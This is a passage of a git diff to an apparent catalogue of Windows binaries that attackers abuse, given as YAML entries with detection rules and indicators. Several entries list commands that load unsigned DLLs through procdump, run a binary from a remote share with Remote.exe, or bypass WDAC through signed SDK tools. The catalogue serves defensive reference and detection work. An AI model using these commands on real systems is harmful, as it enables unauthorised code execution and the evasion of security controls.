'Alfie Champion (@ajpc500)' -Created: '2020-10-14' -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Name: Alfie Champion - Handle: '@ajpc500' ---- +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: '2020-10-14' +Commands: + - Command: procdump.exe -md calc.dll explorer.exe + Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Person: Alfie Champion + Handle: '@ajpc500' diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 37af40f..0ef6457 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 73931d7..cb0d65d 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -10,21 +10,21 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe @@ -37,4 +37,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index f851b49..accc4b1 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ---- diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 235cbf4..64f3c43 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -33,4 +33,3 @@ Acknowledgement: Handle: '@bryon_' - Person: Manny Handle: '@ManuelBerrueta' ---- diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 492d0d4..58c2f90 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index a663d7c..0520437 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@reegun21' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 6059749..ec3001d 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' ---- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 6657aeb..2cfb356 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subTee' ---- diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 7143975..84822c3 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -119,4 +119,3 @@ Acknowledgement: - Person: Adam Handle: '@Hexacorn' - Person: Jesus Galvez ---- diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..95eb07f 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: timwhite Handle: ---- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index a32369a..b2d3380 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -1,31 +1,30 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index a1eb7c8..29cbb5e 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 13e6a11..b9de32f 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -1,28 +1,27 @@ ---- -Name: Wfc.exe -Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: wfc.exe c:\path\to\test.xoml - Description: Execute arbitrary C# code embedded in a XOML file. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe -Code_Sample: - - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 2453029..11bc887 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 6884dfc..ab97c09 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -49,4 +49,3 @@ Acknowledgement: Handle: '@NotoriousRebel1' - Person: Asif Matadar Handle: '@d1r4c' ----